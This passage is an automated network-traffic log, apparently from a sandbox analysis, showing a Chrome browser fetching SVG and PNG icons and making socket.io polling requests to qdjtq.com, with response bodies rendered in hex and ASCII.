            2024-09-27 00:29:47 UTC6858INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 4e 08 06 00 00 00 76 66 19 af 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 1a 81 49 44 41 54 78 9c ed 9d 59 73 da 58 da c7 ff 5a 10 62 17 8b 31 8b 6d 6c f0 12 27 76 9c a4 bb b3 cc d2 35 5d 33 17 73 35 9f 69 3e cf 5c cf 7d 2f 53 9d 9a 49 d2 49 ba 4d 62 bc e0 d8 2c 36 8b 31 66 15 48 08 bd 17 79 cf 69 30 60 e3 38 5b 37 fa 55 a5 aa 1b 8c f4 48 3a cf 39 e7 59 c5 e8 ba ae c3 c0 60 42 61 3f b5 00 06 06 9f 12 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a fe 63 9d a8 d9 6c e2 f4 f4 14 b5 5a 0d 8a a2 40 d3 34 a8 aa 0a 00 e0 38 0e 3c cf c3 64 32 c1 66 b3 c1 e3 f1 c0 e9 74 7e 2c d1 0c 26 18 e6 43 e5 02
            Data Ascii: PNGIHDRNvfsBIT|dIDATxYsXZb1ml'v5]3s5i>\}/SIIMb,61fHyi0`8[7UH:9Y`Ba?C&C&C&C&C&C&C&C&C&clZ@48<d2ft~,&C


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            49192.168.2.649773129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC597OUTGET /modify/layout/images/65.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:47 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Content-Type: image/svg+xml
            Content-Length: 3857
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"f11-1902494f420"
            2024-09-27 00:29:47 UTC3857INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 30 2e 37 37 37 33 36 34 22 20 79 31 3d 22 30 2e 30 38 36 35 35 34 35 36 35 22 20 78 32 3d 22 30 2e 30 37
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <linearGradient x1="0.777364" y1="0.086554565" x2="0.07


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            50192.168.2.649772129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC597OUTGET /modify/layout/images/66.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:47 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Content-Type: image/svg+xml
            Content-Length: 1536
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"600-1902494f420"
            2024-09-27 00:29:47 UTC1536INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 76 69 65 77 42 6f 78 3d 22 30 2c 30 2c 32 35 36 2c 32 35 36 22 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 73 74 72 6f 6b 65 3d 22 23 32 36 32 30 32 38 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 32 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 62 75 74 74 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 6d 69 74 65 72 22 20 73 74 72 6f 6b 65 2d
            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0,0,256,256" width="23px" height="23px"><g fill="none" fill-rule="nonzero" stroke="#262028" stroke-width="32" stroke-linecap="butt" stroke-linejoin="miter" stroke-


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            51192.168.2.649775129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC360OUTGET /modify/layout/images/52.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:47 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Content-Type: image/svg+xml
            Content-Length: 1257
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"4e9-1902494f420"
            2024-09-27 00:29:47 UTC1257INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 31 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 20 31 31 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 49 63 6f 6e 2f 6d 6f 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 66 69 6c 74 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="3px" height="11px" viewBox="0 0 3 11" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Icon/more</title> <defs> <filter color-interpolati


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            52192.168.2.649774129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC360OUTGET /modify/layout/images/62.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:47 UTC314INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:46 GMT
            Content-Type: image/svg+xml
            Content-Length: 8357
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"20a5-1902494f420"
            2024-09-27 00:29:47 UTC8357INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 35 2e 30 2e 31 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22
            Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            53192.168.2.649776129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC597OUTGET /modify/layout/images/67.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:47 GMT
            Content-Type: image/svg+xml
            Content-Length: 1450
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"5aa-1902494f420"
            2024-09-27 00:29:48 UTC1450INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 2d 32 33 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 32 33 43 31 37 2e 38 35 31 33 20 32 33 20 32 33 20 31 37 2e 38 35 31 33 20 32 33 20 31
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="Group-23"> <path d="M11.5 23C17.8513 23 23 17.8513 23 1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            54192.168.2.649777129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC597OUTGET /modify/layout/images/68.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:47 GMT
            Content-Type: image/svg+xml
            Content-Length: 1101
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"44d-1902494f420"
            2024-09-27 00:29:48 UTC1101INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 6c 69 6e 6b 65 64 69 6e 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 30 43 31 37 2e 38 35 31 36 20 30 20 32 33 20 35 2e 31 34 39 31 32 20 32 33 20 31 31 2e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="linkedin"> <path d="M11.5 0C17.8516 0 23 5.14912 23 11.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            55192.168.2.649778129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:46 UTC663OUTPOST /socket.io/?EIO=4&transport=polling&t=P8muZBe&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 49
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:46 UTC49OUTData Raw: 34 32 30 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 5b 22 75 73 65 72 22 5d 5d
            Data Ascii: 420["login","user-VCWLaoDbYs5J0K0KAHtt",["user"]]
            2024-09-27 00:29:48 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:47 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:48 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            56192.168.2.649780129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:47 UTC360OUTGET /modify/layout/images/53.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:47 GMT
            Content-Type: image/svg+xml
            Content-Length: 14355
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"3813-1902494f420"
            2024-09-27 00:29:48 UTC14355INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 38 32 70 78 22 20 68 65 69 67 68 74 3d 22 33 31 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 38 32 20 33 31 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 30 2e 34 38 34 32 38 38 38 37 22 20 79 31 3d 22 31 2e 30 31 34 38 38 38 33 22 20 78 32 3d 22 30 2e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="182px" height="31px" viewBox="0 0 182 31" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <linearGradient x1="0.48428887" y1="1.0148883" x2="0.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            57192.168.2.649779129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:47 UTC365OUTGET /api/MC4xNTY5NDAyMDU5Nzc3NTExNg== HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC164INHTTP/1.1 404 Not Found
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:47 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:48 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            58192.168.2.649782129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC360OUTGET /modify/layout/images/63.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: image/svg+xml
            Content-Length: 1956
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"7a4-1902494f420"
            2024-09-27 00:29:48 UTC1956INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 33 39 70 78 22 20 68 65 69 67 68 74 3d 22 33 39 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 39 20 33 39 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 2d 32 35 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 4c 33 39 20 30 4c 33 39 20 33 39 4c 30 20 33 39 4c 30 20 30 5a 22 20 69 64 3d 22 52 65 63 74
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="39px" height="39px" viewBox="0 0 39 39" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="Group-25"> <path d="M0 0L39 0L39 39L0 39L0 0Z" id="Rect


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            59192.168.2.649783129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8muZBc&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:48 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            60192.168.2.649781129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC360OUTGET /modify/layout/images/64.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: image/svg+xml
            Content-Length: 2075
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"81b-1902494f420"
